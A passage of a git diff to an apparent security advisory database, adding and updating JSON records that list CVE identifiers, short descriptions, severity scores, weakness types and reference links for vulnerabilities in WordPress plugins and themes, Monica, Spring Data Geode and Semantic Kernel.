"https://patchstack.com/database/Wordpress/Plugin/wpdm-elementor/vulnerability/wordpress-download-manager-addons-for-elementor-plugin-1-3-0-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json b/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json new file mode 100644 index 0000000000000..d42635c0b7521 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqpx-frj2-7xmj", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26102" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26102" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26102" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json new file mode 100644 index 0000000000000..953587e042e26 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrqv-46c5-q67w", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22383" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22383" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json b/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json new file mode 100644 index 0000000000000..12b48bed071c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wv4q-94jw-h996", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68526" + ], + "details": "Deserialization of Untrusted Data vulnerability in A WP Life Modal Popup Box modal-popup-box allows Object Injection.This issue affects Modal Popup Box: from n/a through <= 1.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68526" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/modal-popup-box/vulnerability/wordpress-modal-popup-box-plugin-1-6-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json b/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json new file mode 100644 index 0000000000000..cd2bef6b8b7c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww4h-gqqf-68h9", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2849" + ], + "details": "A vulnerability has been found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. Affected by this issue is the function deleteCache/removeAllCache/syncCache of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\sys\\controller\\CacheController.java of the component Cache Sync Handler. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2849" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/60" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/60#issue-3846666902" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347085" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347085" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754428" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json b/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json new file mode 100644 index 0000000000000..04a0dff2d8dcb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxg7-qr4v-6w49", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69371" + ], + "details": "Deserialization of Untrusted Data vulnerability in AncoraThemes KindlyCare kindlycare allows Object Injection.This issue affects KindlyCare: from n/a through <= 1.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69371" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/kindlycare/vulnerability/wordpress-kindlycare-theme-1-6-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json b/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json new file mode 100644 index 0000000000000..c292791304e30 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x25m-mgjq-j9gg", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68026" + ], + "details": "Missing Authorization vulnerability in Niaj Morshed LC Wizard ghl-wizard allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LC Wizard: from n/a through <= 2.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68026" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ghl-wizard/vulnerability/wordpress-lc-wizard-plugin-2-1-0-settings-change-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json new file mode 100644 index 0000000000000..c819e34199f9c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x57h-c6qr-3m4q", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22376" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Parkivia parkivia allows PHP Local File Inclusion.This issue affects Parkivia: from n/a through <= 1.1.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22376" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/parkivia/vulnerability/wordpress-parkivia-theme-1-1-9-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json index 0a7a54aed1d6f..5372b368f4151 100644 --- a/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json +++ b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x648-6h35-89x6", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-25005" ], "details": "Authorization Bypass Through User-Controlled Key vulnerability in N-Media Frontend File Manager nmedia-user-file-uploader allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Frontend File Manager: from n/a through <= 23.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-639" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json new file mode 100644 index 0000000000000..63ac5f6018190 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6m2-4qvv-ghf6", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69367" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Oyster - Photography WordPress Theme oyster allows DOM-Based XSS.This issue affects Oyster - Photography WordPress Theme: from n/a through <= 4.4.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69367" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/oyster/vulnerability/wordpress-oyster-photography-wordpress-theme-theme-4-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json b/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json new file mode 100644 index 0000000000000..34f8f8468f012 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcg8-79j4-g746", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69382" + ], + "details": "Deserialization of Untrusted Data vulnerability in themesflat Themesflat Elementor themesflat-elementor allows Object Injection.This issue affects Themesflat Elementor: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69382" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/themesflat-elementor/vulnerability/wordpress-themesflat-elementor-plugin-1-0-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json b/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json new file mode 100644 index 0000000000000..6899349c2bf6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcv9-r62w-jh9r", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22377" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Saveo saveo allows PHP Local File Inclusion.This issue affects Saveo: from n/a through <= 1.1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22377" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/saveo/vulnerability/wordpress-saveo-theme-1-1-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json new file mode 100644 index 0000000000000..3bc08b8a5eb03 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf4f-qj26-72pf", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26747" + ], + "details": "A Host Header Poisoning vulnerability exists in Monica 4.1.2 due to improper handling of the HTTP Host header in app/Providers/AppServiceProvider.php, combined with the default misconfiguration where the \"app.force_url\" is not set and default is \"false\". The application generates absolute URLs (such as those used in password reset emails) using the user-supplied Host header. This allows remote attackers to poison the password reset link sent to a victim,", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26747" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2026-26747.md" + }, + { + "type": "WEB", + "url": "https://github.com/monicahq/monica" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json new file mode 100644 index 0000000000000..8530d1187e7be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfxx-38qx-mrf4", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22357" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS.This issue affects Link Whisper Free: from n/a through <= 0.9.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22357" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/link-whisper/vulnerability/wordpress-link-whisper-free-plugin-0-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json new file mode 100644 index 0000000000000..e723a1688579b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xg7c-7v8p-8ww8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69302" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Core Features designthemes-core-features allows Reflected XSS.This issue affects DesignThemes Core Features: from n/a through <= 2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69302" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/designthemes-core-features/vulnerability/wordpress-designthemes-core-features-plugin-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json b/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json new file mode 100644 index 0000000000000..9184913deb4ea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgmj-j94q-46cv", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24946" + ], + "details": "Missing Authorization vulnerability in tychesoftwares Print Invoice & Delivery Notes for WooCommerce woocommerce-delivery-notes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Print Invoice & Delivery Notes for WooCommerce: from n/a through <= 5.8.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24946" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-delivery-notes/vulnerability/wordpress-print-invoice-delivery-notes-for-woocommerce-plugin-5-8-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json index 43ef0684817b8..e1bb093941e4b 100644 --- a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json +++ b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xp6f-p933-2gqg", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-20T18:31:26Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2026-26214" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26214" }, + { + "type": "WEB", + "url": "https://github.com/XavLimSG/Vulnerability-Research/blob/main/CVE-2026-26214/CVE-2026-26214.md" + }, { "type": "WEB", "url": "https://github.com/XiaoMi/galaxy-fds-sdk-android" diff --git a/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json b/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json new file mode 100644 index 0000000000000..b978e80e92017 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq4j-x39q-xhqm", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2818" + ], + "details": "A zip-slip path traversal vulnerability in Spring Data Geode's import snapshot functionality allows attackers to write files outside the intended extraction directory. This vulnerability appears to be susceptible on Windows OS only.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2818" + }, + { + "type": "WEB", + "url": "https://www.herodevs.com/vulnerability-directory/cve-2026-2818" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json b/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json new file mode 100644 index 0000000000000..db17afa39f654 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrpj-w92h-g66g", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69297" + ], + "details": "Missing Authorization vulnerability in GhostPool Aardvark Plugin aardvark-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Aardvark Plugin: from n/a through <= 2.19.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69297" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/aardvark-plugin/vulnerability/wordpress-aardvark-plugin-plugin-2-19-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json b/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json new file mode 100644 index 0000000000000..4af6821038f94 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xv8f-556c-h484", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69402" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX R&F rf allows PHP Local File Inclusion.This issue affects R&F: from n/a through <= 1.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69402" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/rf/vulnerability/wordpress-r-f-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file From 16b4db11e46890053f008bb3bdd6e966c4a3acb3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 19:17:29 +0000 Subject: [PATCH 16/77] Publish GHSA-2ww3-72rp-wpp4 --- .../2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json index e45687d59f376..92c8917e68d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2ww3-72rp-wpp4", - "modified": "2026-02-18T23:32:12Z", + "modified": "2026-02-20T19:15:43Z", "published": "2026-02-06T18:37:24Z", "aliases": [ "CVE-2026-25592" ], "summary": "Semantic Kernel has Arbitrary File Write via AI Agent Function Calling in .NET SDK", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation 